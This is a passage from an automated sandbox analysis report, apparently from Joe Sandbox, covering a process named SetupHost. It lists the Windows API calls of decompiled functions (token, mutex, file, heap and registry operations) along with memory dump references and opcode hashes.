                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02031
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: GetCurrentThread.KERNEL32(00000008,00000001,00A12740,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02047
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: OpenThreadToken.ADVAPI32(00000000,?,00000001,00A12740,0000003C,00A027B4), ref: 00A0204E
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: GetLastError.KERNEL32(?,00000001,00A12740,0000003C,00A027B4), ref: 00A02058
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: GetCurrentProcess.KERNEL32(00000008,00A12740,?,00000001,00A12740,0000003C,00A027B4), ref: 00A0206F
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: OpenProcessToken.ADVAPI32(00000000,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02076
                                                                                                                                                                                                                • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00A027D3
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00A027E8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Initialize$Allocate$CurrentOpenProcessThreadToken$CreateDescriptorErrorLastMutexObjectSecuritySingleWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3485390411-0
                                                                                                                                                                                                                • Opcode ID: 61abe911bbf3393f59fcfadb66c2762433fce3f79c8154e2ce2fd52196a7e3c8
                                                                                                                                                                                                                • Instruction ID: 7784d824926c2eed9deef6b93a8d6a31079af269fa760333dbf25e571b87da84
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61abe911bbf3393f59fcfadb66c2762433fce3f79c8154e2ce2fd52196a7e3c8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69F0963690022CA7DF219B95AC08BEDB7B8EF84720F154115FC10B32C0DB388A02CBE1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,?), ref: 00A02332
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A02340
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                • Opcode ID: cc4ff2a628e8c1060667a2cc02d0133536ce5711a3409a6f527b3aded78947a3
                                                                                                                                                                                                                • Instruction ID: edd704f3392385b03a320864f905712b937559dabad5bc899159a458784e7f22
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc4ff2a628e8c1060667a2cc02d0133536ce5711a3409a6f527b3aded78947a3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6AF030B691011CBF8B14CFB4EC498DE7FB9EB45360B108215FC16D3290E6749E01DBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BreakCloseDebugHandle
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 212039098-0
                                                                                                                                                                                                                • Opcode ID: 177b87f1f644b653c6d96678919e63d1b835ebe5a0c90cc807976a7fe58a9811
                                                                                                                                                                                                                • Instruction ID: e3fa2c1f686b4d88e2cf2f1027d60eba7ae57c6bff8c225cc3361f02d3b74228
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 177b87f1f644b653c6d96678919e63d1b835ebe5a0c90cc807976a7fe58a9811
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50C08C31104308A787009BE2FC0C98A7E2CEA94350300C020F40581020DB3288128661
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00A0290C: GetVersion.KERNEL32 ref: 00A0294F
                                                                                                                                                                                                                  • Part of subcall function 00A0290C: GetModuleHandleW.KERNEL32(kernel32), ref: 00A029C3
                                                                                                                                                                                                                  • Part of subcall function 00A0290C: GetProcAddress.KERNEL32(00000000,AddVectoredExceptionHandler), ref: 00A029D3
                                                                                                                                                                                                                  • Part of subcall function 00A0290C: memset.MSVCRT ref: 00A02A87
                                                                                                                                                                                                                  • Part of subcall function 00A0290C: ExpandEnvironmentStringsW.KERNEL32(%windir%\system32\dbghelp.dll,?,00000104), ref: 00A02AA0
                                                                                                                                                                                                                  • Part of subcall function 00A0290C: LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00A02AB3
                                                                                                                                                                                                                  • Part of subcall function 00A0290C: FreeLibrary.KERNEL32(00000000), ref: 00A02AC8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000054,0052AD90,00000000,009FFBAF), ref: 00A045D7
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A045DE
                                                                                                                                                                                                                  • Part of subcall function 00A02D3B: __EH_prolog3.LIBCMT ref: 00A02D42
                                                                                                                                                                                                                  • Part of subcall function 00A02D3B: GetProcessHeap.KERNEL32(00000000,00000018,00000008,00A045EF), ref: 00A02D83
                                                                                                                                                                                                                  • Part of subcall function 00A02D3B: HeapAlloc.KERNEL32(00000000), ref: 00A02D8A
                                                                                                                                                                                                                  • Part of subcall function 00A02D3B: GetProcessHeap.KERNEL32(00000000,00000018), ref: 00A02DC1
                                                                                                                                                                                                                  • Part of subcall function 00A02D3B: HeapAlloc.KERNEL32(00000000), ref: 00A02DC8
                                                                                                                                                                                                                  • Part of subcall function 00A02D3B: RaiseException.KERNEL32(C0000025,00000001,00000000,00000000), ref: 00A02E2D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcess$Library$AddressEnvironmentExceptionExpandFreeH_prolog3HandleLoadModuleProcRaiseStringsVersionmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3155722559-0
                                                                                                                                                                                                                • Opcode ID: eff0e8206c00191eaa9c9f86abad29110a8c6d02a8e2189a9a1f0c6452c93d4e
                                                                                                                                                                                                                • Instruction ID: 60576b4ca8cabb3754fbbc07ffbfc5935fee84c6402fb2a2e2078b3b4e549769
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eff0e8206c00191eaa9c9f86abad29110a8c6d02a8e2189a9a1f0c6452c93d4e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5F02BF230872923DA39A3B57E2DB6F495D6F89B50B04453DBA01D31C0FD51CC0282B4
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00A0DF1B
                                                                                                                                                                                                                  • Part of subcall function 00A0DD36: __EH_prolog3.LIBCMT ref: 00A0DD3D
                                                                                                                                                                                                                  • Part of subcall function 009B8AF9: GetProcessHeap.KERNEL32(00000000,?,?,?,009BB826,?,?,?,00000000), ref: 009B8B0A
                                                                                                                                                                                                                  • Part of subcall function 009B8AF9: HeapFree.KERNEL32(00000000,?,009BB826), ref: 009B8B11
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3Heap$FreeProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2588364637-0
                                                                                                                                                                                                                • Opcode ID: 3ba60c7aad79faab72161bbb05f239be23ef78adfed5c3889130ee292ba8d4b0
                                                                                                                                                                                                                • Instruction ID: e19769946d7daaa57d28d054bc263add2e8fe698fc4d1d7cb983a68e31ad23c8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ba60c7aad79faab72161bbb05f239be23ef78adfed5c3889130ee292ba8d4b0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4581C471E0120EDBDF19DFE4E995BEEBBB5BF44310F14802AE412AB290DB759A44CB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00A0DD3D
                                                                                                                                                                                                                  • Part of subcall function 00A0D8F8: __EH_prolog3.LIBCMT ref: 00A0D8FF
                                                                                                                                                                                                                  • Part of subcall function 00A0DC16: __EH_prolog3_GS.LIBCMT ref: 00A0DC20
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3$H_prolog3_
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4240126716-0
                                                                                                                                                                                                                • Opcode ID: fd27f357cbfdf70caab18757990aafdc04f122bd4fde1bb366861ef1466c0b1d
                                                                                                                                                                                                                • Instruction ID: 05a740949bdbdbea2411b27184b3919668365a4c5ffd7408d6336a474a432e5b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd27f357cbfdf70caab18757990aafdc04f122bd4fde1bb366861ef1466c0b1d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3451B5B1E0121E8BCF14EFE9E5916EDBBB1AF98310F14802DE905AB391EB749D05CB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 431132790-0
                                                                                                                                                                                                                • Opcode ID: a808f4465adb835dce85323c5d9bdff3902eb547603166d2ef40c90f24447260
                                                                                                                                                                                                                • Instruction ID: aee33c8728f42033ac0a0fed29da4c53b1b245ddc5dbee2f3cb7f36aaa3b393a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a808f4465adb835dce85323c5d9bdff3902eb547603166d2ef40c90f24447260
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C011483161052A8BCF16EE54C6946FE777AAFC8770F19841AF9166B380DF349D02DB81
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,?,00000000,?,?,00000000), ref: 00A028C8
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: InitializeSecurityDescriptor.ADVAPI32(?,00000001,00A12740,0000003C,00A027B4), ref: 00A01FCA
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00A027B4,?,00000001,00A12740,0000003C,00A027B4), ref: 00A01FEF
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000003C,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02010
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02031
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: GetCurrentThread.KERNEL32(00000008,00000001,00A12740,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02047
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: OpenThreadToken.ADVAPI32(00000000,?,00000001,00A12740,0000003C,00A027B4), ref: 00A0204E
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: GetLastError.KERNEL32(?,00000001,00A12740,0000003C,00A027B4), ref: 00A02058
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: GetCurrentProcess.KERNEL32(00000008,00A12740,?,00000001,00A12740,0000003C,00A027B4), ref: 00A0206F
                                                                                                                                                                                                                  • Part of subcall function 00A01F8C: OpenProcessToken.ADVAPI32(00000000,?,00000001,00A12740,0000003C,00A027B4), ref: 00A02076
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Initialize$Allocate$CurrentOpenProcessThreadToken$CreateDescriptorErrorFileLastSecurity
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 720879468-0
                                                                                                                                                                                                                • Opcode ID: 7d1b0f29f1d107ac29c02eeeb86295425c61f52f6cac8009e40ac77e14829fc4
                                                                                                                                                                                                                • Instruction ID: becb613824d3f495557c7d208511f7a77d0e889f3e988cb155b0025d6a3e017e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d1b0f29f1d107ac29c02eeeb86295425c61f52f6cac8009e40ac77e14829fc4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15F0493690022CABDF219FA59C09BDEBB79EB98750F11801AFD10A3291D7349A15CBD0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegGetValueW.KERNEL32(80000002,?,00000000,00010010,00000000,00000003,00000000), ref: 00A0AA7E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                • Opcode ID: 24e45d5e43fc6f1a062c4a054c1abbf729b465f1695dd6c8611724b8bbed437d
                                                                                                                                                                                                                • Instruction ID: bbf73029818abf945e0e9dfc776b18d00d31bc863ba85d1982c1c87ae2f54a29
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24e45d5e43fc6f1a062c4a054c1abbf729b465f1695dd6c8611724b8bbed437d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6E0C2B520020CBBD711CB41CC05FEB3ABCA744754F10C0047640D5190C6B5DA00A774
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,009A9438), ref: 009B8F23
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                • Opcode ID: e3495f749ef042d98c2e8e0caeefbb2f3a0e8edc4215706dbb0285a797fb2efa
                                                                                                                                                                                                                • Instruction ID: 0bd77d331dfed675ff929120d0dfa73531ce7e34923666e8eedee88059b21ec2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3495f749ef042d98c2e8e0caeefbb2f3a0e8edc4215706dbb0285a797fb2efa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CED0A772238210069B7C77396D091EB1595DBC43303650F29F06EC11D0DD39C8428140
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 009A669A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LongWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1378638983-0
                                                                                                                                                                                                                • Opcode ID: 35d6d0a4744dd1622c3249e138736a48e5cb5b11cdfe47378f5ec084cb4cefa3
                                                                                                                                                                                                                • Instruction ID: 04ac7977a99b28ea0b2df14db2513d36deb4064d608ac11f6a913f8142566047
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35d6d0a4744dd1622c3249e138736a48e5cb5b11cdfe47378f5ec084cb4cefa3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32D05E3114810CFBCF129F91EC04EBE3F6AEB81320B088164FC15450B1CB32C832EA90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 00A022F2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileView
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3314676101-0
                                                                                                                                                                                                                • Opcode ID: ba15dc5a351fe0a7422e68aaa950ee70135126ad2a0c804a06818f05b53ff8e2
                                                                                                                                                                                                                • Instruction ID: 7df8f04aebbfebd8a09f4d3e0eb7fc4e57331ba5da32cd7af2a8223ffa31324e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba15dc5a351fe0a7422e68aaa950ee70135126ad2a0c804a06818f05b53ff8e2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41C092B228420CBFA7125AA1AC09DBB7B6DD794710B408022BF08C5422DE719D22B5B4
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00A02383
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                                • Opcode ID: eb8fa5d75a5057abca7dfa6ea633e35e0cd0da040dde14bd7536fa77c743da24
                                                                                                                                                                                                                • Instruction ID: 1e54d8166240c2c366511be249ad2ba4ff5fad8b73720ee5af2358ff7548c918
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb8fa5d75a5057abca7dfa6ea633e35e0cd0da040dde14bd7536fa77c743da24
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AC0023204424DBBCF129F81EC05FDA3F2AEB88761F148411FA1915071C7B2D972EB55
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                • Opcode ID: a9701be4510473ac023470f47a0825ee9d862097c54075792bd244a3fa167c36
                                                                                                                                                                                                                • Instruction ID: d9ff6c4f1573e5c0f950c9ca3617aff1ef3b7b4f9238c386e2ce90b9502e4370
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9701be4510473ac023470f47a0825ee9d862097c54075792bd244a3fa167c36
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC119D75604618AFDB158F78EC09BAE3BA9EB85760F108715F421DB2E0CAB19C12DB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __aulldiv.LIBCMT ref: 009B4A84
